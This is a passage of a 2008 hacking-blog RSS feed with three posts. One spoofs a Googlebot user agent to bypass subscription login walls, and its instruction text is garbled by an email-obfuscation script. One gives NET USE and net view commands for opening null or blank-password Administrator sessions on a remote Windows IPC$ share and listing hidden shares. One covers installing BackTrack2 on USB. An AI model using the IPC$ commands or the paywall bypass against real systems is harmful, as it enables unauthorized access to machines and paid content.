<p>Wait few second&#8230;</p>
<p>If message out is access denied maybe thats system have been patched or firewall enabled</p>
<p> <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/whiskeycola.wordpress.com/16/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/whiskeycola.wordpress.com/16/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/whiskeycola.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/whiskeycola.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/whiskeycola.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/whiskeycola.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/whiskeycola.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/whiskeycola.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/whiskeycola.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/whiskeycola.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/whiskeycola.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/whiskeycola.wordpress.com/16/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=16&subd=whiskeycola&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://whiskeycola.wordpress.com/2008/05/08/other-way-to-gaining-access-on-windows-xp/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/490d8edd6b56cf0ece96af49f0e71967?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">whiskeycola</media:title>
		</media:content>
	</item>
		<item>
		<title>Break subscribtion only areas with user agen switcher</title>
		<link>http://whiskeycola.wordpress.com/2008/05/08/break-subscribtion-only-areas-with-user-agen-switcher/</link>
		<comments>http://whiskeycola.wordpress.com/2008/05/08/break-subscribtion-only-areas-with-user-agen-switcher/#comments</comments>
		<pubDate>Thu, 08 May 2008 03:39:32 +0000</pubDate>
		<dc:creator>whiskeycola</dc:creator>
				<category><![CDATA[Firefox]]></category>

		<guid isPermaLink="false">http://whiskeycola.wordpress.com/?p=15</guid>
		<description><![CDATA[Ocassionally you may come across a site on google, click the link to read the article and be presented with a log in page. To register for just one article is too much hassle. 
Load up firefox and goto  http://chrispederick.com/work/useragentswitcher/ and download the useragent extension, restart firefox.
Now go to Tools -&#62; User Agent Switcher [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=15&subd=whiskeycola&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Ocassionally you may come across a site on google, click the link to read the article and be presented with a log in page. To register for just one article is too much hassle. <span id="more-15"></span></p>
<p>Load up firefox and goto  http://chrispederick.com/work/useragentswitcher/ and download the useragent extension, restart firefox.</p>
<p>Now go to Tools -&gt; User Agent Switcher -&gt; Options -&gt; Options</p>
<p>Click user agents, then add, put whatever you want in the description to remind you of which user agent it is for this example googlebot, now copy and paste this into the user agent box: Googlebot/1.0 (<br />
&lt;!&#8211;<br />
var prefix = &#8216;ma&#8217; + &#8216;il&#8217; + &#8216;to&#8217;;<br />
var path = &#8216;hr&#8217; + &#8216;ef&#8217; + &#8216;=&#8217;;<br />
var addy97106 = &#8216;googlebot&#8217; + &#8216;@&#8217;;<br />
addy97106 = addy97106 + &#8216;googlebot&#8217; + &#8216;.&#8217; + &#8216;com&#8217;;<br />
document.write( &#8216;&lt;a &#8216; + path + &#8216;\&#8221; + prefix + &#8216;:&#8217; + addy97106 + &#8216;\&#8217;&gt;&#8217; );<br />
document.write( addy97106 );<br />
document.write( &#8216;&lt;\/a&gt;&#8217; );<br />
//&#8211;&gt;\n <a href="mailto:googlebot@googlebot.com">googlebot@googlebot.com</a><br />
&lt;!&#8211;<br />
document.write( &#8216;&lt;span style=\&#8217;display: none;\&#8217;&gt;&#8217; );<br />
//&#8211;&gt;<br />
<span style="display:none;">This e-mail address is being protected from spam bots, you need JavaScript enabled to view it<br />
&lt;!&#8211;<br />
document.write( &#8216;&lt;/&#8217; );<br />
document.write( &#8217;span&gt;&#8217; );<br />
//&#8211;&gt;<br />
</span> http://googlebot.com/)  Leave the rest blank. Click ok.</p>
<p>Now visit the site again, click tools -&gt; user agent switcher -&gt; googlebot. Hit refresh. Now you should be viewing the full article</p>
<p> <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/whiskeycola.wordpress.com/15/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/whiskeycola.wordpress.com/15/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/whiskeycola.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/whiskeycola.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/whiskeycola.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/whiskeycola.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/whiskeycola.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/whiskeycola.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/whiskeycola.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/whiskeycola.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/whiskeycola.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/whiskeycola.wordpress.com/15/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=15&subd=whiskeycola&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://whiskeycola.wordpress.com/2008/05/08/break-subscribtion-only-areas-with-user-agen-switcher/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/490d8edd6b56cf0ece96af49f0e71967?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">whiskeycola</media:title>
		</media:content>
	</item>
		<item>
		<title>IPC$ Share Null Session Exploit</title>
		<link>http://whiskeycola.wordpress.com/2008/05/07/ipc-share-exploit/</link>
		<comments>http://whiskeycola.wordpress.com/2008/05/07/ipc-share-exploit/#comments</comments>
		<pubDate>Wed, 07 May 2008 18:08:09 +0000</pubDate>
		<dc:creator>whiskeycola</dc:creator>
				<category><![CDATA[NetBios]]></category>

		<guid isPermaLink="false">http://whiskeycola.wordpress.com/?p=14</guid>
		<description><![CDATA[What is the IPC$ share exploit and how to exploit it&#8230;
What is the IPC$ Share? 
IPC stands for Inter-Process Communication. This share is used for data sharing between applications and computers. With this share a hacker can take total control of a PC. It has been said that one group of individuals on the net [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=14&subd=whiskeycola&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>What is the IPC$ share exploit and how to exploit it&#8230;</p>
<p><span style="text-decoration:underline;"><strong>What is the IPC$ Share? </strong></span></p>
<p>IPC stands for Inter-Process Communication. This share is used for data sharing between applications and computers. With this share a hacker can take total control of a PC. <span id="more-14"></span>It has been said that one group of individuals on the net managed to dominate an entire companies network through a single persons PC. This exploit can be discovered easily with many NSS, the one i prefer using is GFI.</p>
<p><span style="text-decoration:underline;"><strong>How a hacker abused the exploit…</strong></span></p>
<p>So firstly we have established using our NSS that the IPC$ share is available, we also have the admin password (during writing this article i discovered that the target machine had no admin password, however using a program like the big red button or the Net Bios Auditing tool you can obtain this)<br />
Using the NET commands within DOS we can find and map to shares on remote computer.<br />
Now when going for an NT machine make sure port 139 is open, this can be found out using a normal port scanner, open up DOS and type in the following:</p>
<p>C:\&gt;NET USE \\TARGET\IPC$ &#8220;&#8221; /USER:&#8221;"</p>
<p>This is basically saying you want to use the IPC share on the specified target with the password “” and the user name “”. Now we have just asked to make a null session on the target share. Chances are slim that you will obtain it like this so its always handy when the admin password has not been set . When you want to log in as an administrator to the share you would type in the following:</p>
<p>C:\&gt;NET USE \\123.213.123.123\IPC$ &#8220;&#8221; /USER:Administrator</p>
<p>This is stating that you want to connect under the local account “Administrator” with no password.</p>
<p>After starting a null connection you could try to access the hidden shares. The default hidden shares are: C$, PRINT$, ADMIN$, IPC$. These folders will be invisible to the average user due to the $ sign being placed at the end. Sometimes shares don&#8217;t have passwords so you can use them without the admins password. Null sessions raerely get you onto shared folders as its not all that dissimilar from a homeless man asking for the keys to the playboy mansion. Null sessions have very little rights on the system.. Next you could try using net view. To do this open the DOS window and type:</p>
<p>C:\&gt;net view \\123.123.123.123 &lt;&#8212; This will display all shares on this machine (WILL NOT DISPLAY THE IPC$ OR ANY OTHER SILENT SHARES)</p>
<p>C:\&gt;net view /workgroup:MSHome &lt;&#8212; Same as above but for workgroups Replace &#8220;MSHome&#8221; with the name of the workgroup</p>
<p>C:\&gt;net view /domain:Domain &lt;&#8212; Same as above but with domains Replace &#8220;Domain&#8221; with the domain name.</p>
<p> <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> :D</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/whiskeycola.wordpress.com/14/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/whiskeycola.wordpress.com/14/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/whiskeycola.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/whiskeycola.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/whiskeycola.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/whiskeycola.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/whiskeycola.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/whiskeycola.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/whiskeycola.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/whiskeycola.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/whiskeycola.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/whiskeycola.wordpress.com/14/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=14&subd=whiskeycola&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://whiskeycola.wordpress.com/2008/05/07/ipc-share-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/490d8edd6b56cf0ece96af49f0e71967?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">whiskeycola</media:title>
		</media:content>
	</item>
		<item>
		<title>Howto:Install a full bootable version of BackTrack2 on a USB Stick</title>
		<link>http://whiskeycola.wordpress.com/2008/05/07/howtoinstall-a-full-bootable-version-of-backtrack2-on-a-usb-stick/</link>
		<comments>http://whiskeycola.wordpress.com/2008/05/07/howtoinstall-a-full-bootable-version-of-backtrack2-on-a-usb-stick/#comments</comments>
		<pubDate>Wed, 07 May 2008 17:30:09 +0000</pubDate>
		<dc:creator>whiskeycola</dc:creator>
				<category><![CDATA[Backtrack]]></category>

		<guid isPermaLink="false">http://whiskeycola.wordpress.com/?p=13</guid>
		<description><![CDATA[1. Open the backtrack.iso file:
Option 1. In Windows, use a program such as isobuster
Option 2. In Backtrack, mount the iso ; (mount -o loop -t iso9660 yourcd.iso /mnt/iso)
Option 3. In OSX, mount the iso 
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;

2. Copy the /boot and /BT folders from the iso to the USB flash stick
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;
Warning: the following step makes the device [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=13&subd=whiskeycola&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><strong>1. Open the backtrack.iso file:</strong></p>
<p>Option 1. In Windows, use a program such as isobuster<br />
Option 2. In Backtrack, mount the iso ; (mount -o loop -t iso9660 yourcd.iso /mnt/iso)<br />
Option 3. In OSX, mount the iso <span id="more-13"></span><br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
<strong><br />
2. Copy the /boot and /BT folders from the iso to the USB flash stick</strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
<em>Warning: the following step makes the device bootable by creating an MBR. Make sure you run this command from the USB stick, not from the mounted iso, otherwise you will corrupt your existing MBR.</em></p>
<p><strong>3. Make the USB Stick bootable:</strong></p>
<p>Option 1. In Windows, cd into &lt;path to stick&gt;/boot, and execute the bootinst.bat.<br />
Option 2. In BackTrack or OSX, cd into &lt;path to stick&gt;/boot, and execute the bootinst.sh</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
<strong>4. The author assumes no responsibility for this procedure, especially if you don&#8217;t RTFM, particularly the Warning in step 3.</strong></p>
<p>Annotation from an unidentified poster:<br />
If using the Backtrack Installer from the Version 2.0 Final LiveCD do the following:</p>
<ul>
<li>use /boot as source, then select sda for creating the MBR on it and sda1_removable or the Name of your stick as Destination folder,</li>
<li>Make sure not to choose your HD Drive here !!! It will render your current OS Install useless !!!</li>
<li>After that just copy the BT Directory to the stick.</li>
<li>These Steps were supposed to be automatically done by the Backtrack Installer on the LiveCD Iso, unfortunately it`s broken in the Final Version, when ran from the LiveCD. Sorry.</li>
</ul>
<p><em>Annotation WARNING IMPORTANT:<br />
Before You say That your key is not working/booting : TRY ALL of your usb ports (front,left,back,right ALL&#8230;) Some Usb 2.0 hardware restricts Booting To different ports.. For me, the front ports were not booting, so I tried back and it worked ! After a while , I retried to boot in front usb, AND IT WAS WORKING &#8230;??? Good Luck !</em></p>
<p> <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/whiskeycola.wordpress.com/13/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/whiskeycola.wordpress.com/13/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/whiskeycola.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/whiskeycola.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/whiskeycola.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/whiskeycola.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/whiskeycola.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/whiskeycola.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/whiskeycola.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/whiskeycola.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/whiskeycola.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/whiskeycola.wordpress.com/13/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=13&subd=whiskeycola&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://whiskeycola.wordpress.com/2008/05/07/howtoinstall-a-full-bootable-version-of-backtrack2-on-a-usb-stick/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/490d8edd6b56cf0ece96af49f0e71967?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">whiskeycola</media:title>
		</media:content>
	</item>
	</channel>
</rss>